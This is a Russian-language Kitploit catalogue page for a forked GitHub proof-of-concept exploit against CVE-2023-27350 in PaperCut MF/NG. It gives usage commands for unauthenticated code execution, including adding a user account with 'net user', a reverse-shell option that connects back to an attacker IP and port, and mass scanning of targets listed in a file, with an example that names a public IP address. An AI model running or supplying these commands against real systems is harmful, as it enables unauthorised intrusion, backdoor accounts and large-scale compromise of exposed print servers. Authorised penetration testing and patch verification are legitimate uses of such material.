Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-27350 — Эксплойт для Papercut CVE-2023-27350. [+] Обратная оболочка [+] Массовая проверка | Kitploit
Инструменты/GitHubGitHub/adhikara13/cve-2023-27350
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеРазработка Полезной Нагрузки
GitHubadhikara13/cve-2023-27350

CVE-2023-27350

Эксплойт для Papercut CVE-2023-27350. [+] Обратная оболочка [+] Массовая проверка

Репозиторий
9323 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-27350 Эксплойт POC

Это эксплойт Proof of Concept (POC) для CVE-2023-27350, уязвимости, обнаруженной в PaperCut MF/NG, которая позволяет неавторизованному злоумышленнику выполнять произвольный код с привилегиями SYSTEM.

Требования

Перед использованием этого эксплойта убедитесь, что вы установили следующие библиотеки:

root@kitploit:~
pip install -r requirements.txt

Использование

root@kitploit:~
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]

Опции

  • -u, --url: URL целевого приложения PaperCut MF/NG (например, http://target-ip:9191).
  • -c, --command: Команда для выполнения на целевой системе.
  • --reverse-shell: Использовать полезную нагрузку reverse shell для выполнения команд на целевой системе.
  • -f, --file: Проверить несколько целей из файла (например, file.txt).

Пример

Выполнение команды

Чтобы выполнить команду на целевой системе, используйте опцию -c:

root@kitploit:~
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"

Reverse Shell

Чтобы использовать полезную нагрузку reverse shell для выполнения команд на целевой системе, используйте опцию --reverse-shell. Вам будет предложено ввести ваш IP-адрес и номер порта:

root@kitploit:~
python exploit.py -u http://target-ip:9191 --reverse-shell Enter your IP address: <attacker-ip> Enter your port number: <port>

Массовая проверка

Чтобы проверить несколько целей из файла, используйте опцию -f. Формат файла должен быть ip_address:port:

root@kitploit:~
python CVE-2023-27350.py -f file.txt

Форматирование file.txt

При использовании опции массовой проверки с входным файлом file.txt убедитесь, что содержимое файла отформатировано правильно.

Каждая строка файла должна содержать IP-адрес и номер порта цели, разделенные двоеточием :. Например:

root@kitploit:~
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080

Убедитесь, что между IP-адресом, двоеточием и номером порта нет лишних пробелов или символов. Также убедитесь, что каждая строка содержит только один IP-адрес и номер порта.

Credits

Это форкнутая версия репозитория horizon3ai/CVE-2023-27350. Все заслуги за оригинальный эксплойт принадлежат авторам.

Скачать инструмент